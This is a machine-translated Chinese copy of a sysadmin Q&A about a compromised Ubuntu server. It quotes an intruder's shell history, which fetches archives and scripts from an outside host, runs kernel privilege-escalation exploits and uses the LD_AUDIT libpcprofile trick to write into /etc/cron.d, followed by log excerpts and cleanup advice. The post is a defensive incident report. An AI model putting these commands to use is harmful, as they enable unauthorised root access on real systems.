服务器 Gind.cn
  1. 服务器 Gind.cn
  3. Ubuntu服务器黑客
Intereting Posts
MAC广播命令 在Windows 2008 R2恢复DVD中是否有机会获得Hyper-V启蒙I / O? 如何解释Django / Python安装到运行共享IIS服务器的Python新手 有故障转移支持的免费DNS软件? 有没有办法找出Oracle转储文件需要的必要用户,angular色和权限? VPS CPU使用率非常高 如何将子域指向不同的本地IP 不同的时区服务器 在IIS上通过PHP发布一个大文件后接收404 NetBIOS名称parsing – 我怎样才能工作? 映射软盘驱动器到USB 可能隐藏CPU指令集标志? 不要logging“文件不存在”错误。 如何? 我怎样才能避免在nginx中使用别名? 为失败的根ssh压缩OSSEC电子邮件

Ubuntu服务器黑客

我看着netstat,我注意到除了我以外的人通过SSH连接到服务器。 我照顾这个,因为我的用户只有一个SSH访问。 我发现这在一个FTP用户.bash_history文件: 

w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd

系统在监狱里 在目前的情况下是否重要? 我该怎么办?

感谢大家!

我已经做了这些: – 禁止与iptables连接的SSH主机 – 停在监狱sshd – 保存:bach_history,syslog,dmesg,文件在bash_history的wget行

我安装了rkhunter,并取消隐藏。 我运行“unhide sys”命令,导致1个隐藏进程。 现在我正在运行rkhunter …好的。

rkhunter -c导致了一些警告:

  • 在监狱:检查是否允许SSH根访问[警告]检查系统日志configuration文件[警告]

    执行文件系统检查检查隐藏文件和目录[警告]

  • 主机系统:执行文件系统检查检查/开发可疑文件types[警告]检查隐藏文件和目录[警告]

我在dmesg和syslog中发现黑客试图用irda做些事情:

  • 系统日志: 
  2月28日22:48:41 i386内核:[4180166.230061] irda_init()
 2月28日22:48:41 i386内核:[4180166.230077] NET:注册协议族23
 2月28日22:48:46 i386内核:[4180171.242169] ioctl32(2.6.31:4726):未知cmd fd(0)cmd(ffbb382c){t:'8'; sz:16315} arg(00000001)on / dev / PTS / 0
 2月28日22:49:12 i386 sudo:pam_sm_authenticate:调用
 2月28日22:49:12 i386 sudo:pam_sm_authenticate:username = [i]
 Feb 28 22:49:12 i386 sudo:pam_sm_authenticate:/ home / i已经挂载
 2月28日22:49:33 i386内核:[4180218.465341]可以:控制器区域networking核心(rev 20090105 abi 8)
 2月28日22:49:33 i386内核:[4180218.465413] NET:注册的协议族29
 2月28日22:49:33 i386内核:[4180218.493398]可以:广播pipe理协议(rev 20090105 t)
 2月28日23:00:49 i386内核:[4180894.035222] ip_tables:(C)2000-2006 Netfilter核心团队
 2月28日23:13:48 i386 sudo:pam_sm_authenticate:调用
 2月28日23:13:48 i386 sudo:pam_sm_authenticate:username = [i]
 Feb 28 23:13:48 i386 sudo:pam_sm_authenticate:/ home / i已经挂载
 Feb 28 23:17:01 i386 CRON [10126] :(根)CMD(cd / && run-parts --report /etc/cron.hourly)
 2月28日23:36:29 i386 sudo:pam_sm_authenticate:调用
 2月28日23:36:29 i386 sudo:pam_sm_authenticate:username = [i]
 Feb 28 23:36:29 i386 sudo:pam_sm_authenticate:/ home / i已经挂载
  • dmesg的: 
  [4180166.230061] irda_init()
 [4180166.230077] NET:注册的协议族23
 / dev / pts / 0 [4180171.242169] ioctl32(2.6.31:4726):Unknown cmd fd(0)cmd(ffbb382c){t:'8'; sz:16315} arg
 [4180218.465341]可以:控制器局域网核心(rev 20090105 abi 8)
 [4180218.465413] NET:注册的协议族29
 [4180218.493398]可以:广播pipe理器协议(rev 20090105 t)
 [4180894.035222] ip_tables:(C)2000-2006 Netfilter核心团队

将系统closures,备份以备未来取证分析,然后重新构build,并从已知的良好备份中恢复所需的任何数据。 任何不足之处都会使潜在的恶意代码被投入使用。

你可以尝试复制黑客所做的事情,看看它是否能在某个时候成功(他是否设法在cron脚本中复制这个“exploit”文件?)。 你可能想运行rkhunter来检查你是否有根,但它可能隐藏在其他地方。